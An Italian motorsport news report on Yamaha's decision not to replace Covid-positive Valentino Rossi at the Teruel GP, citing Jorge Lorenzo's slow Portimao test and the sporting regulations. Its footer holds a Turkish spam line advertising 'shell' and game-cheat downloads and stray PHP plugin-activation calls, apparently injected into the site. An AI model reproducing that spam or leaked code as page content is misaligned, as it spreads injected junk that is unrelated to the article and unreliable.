Yamaha, nessun sostituto per Rossi tra 7 giorni


Vista la poca competitività di Lorenzo a Portimao, Iwata con una sola moto nel GP Terual

Dal nostro inviato Paolo Ianieri

18 ottobre
– Milano

La Yamaha non sostituirà Valentino Rossi nel GP di Teruel in programma la prossima settimana sempre sulla pista di Aragon. Come si era intuito negli scorsi dopo la positività al Coronavirus di Valentino, nonostante abbia fermo ai box Jorge Lorenzo, ingaggiato a inizio anno come collaudatore, la poca competitività mostrata dall’ex iridato durante i test di Portimao effettuati alla vigilia di Le Mans, dove ha girato con tempi altissimi e peggiori perfino di molti che utilizzavano una moto stradale, hanno convinto i vertici di Iwata a non utilizzarlo come sostituto del pesarese. E, allo stesso tempo, di non chiamare neppure Toprak Razgatlioglu, il turco vincitore ieri di gara-1 del Mondiale Superbike, mentre l’olandese Michael van der Mark oggi correrà la sua ultima gara con la Yamaha prima di passare alla Bmw. Essendo l’impedimento di Rossi arrivato entro i 10 giorni dalla gara successiva (quando scatta contrattualmente l’obbligo nei confronti della Dorna di avere un sostituto), la Yamaha in base all’articolo 1.11.3 del Regolamento Sportivo potrà permettersi di schierare tra sette giorni il solo Maverick Vinales, mente nel caso in cui Valentino non dovesse riuscire a recuperare per la prima gara di Valencia dell’8 novembre, sarà obbligatorio sostituirlo. E in quel caso scoccherebbe l’ora di Lorenzo, con la Yamaha che starebbe già pensando a un nuovo test per permettergli di ritrovare un po’ di feeling.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );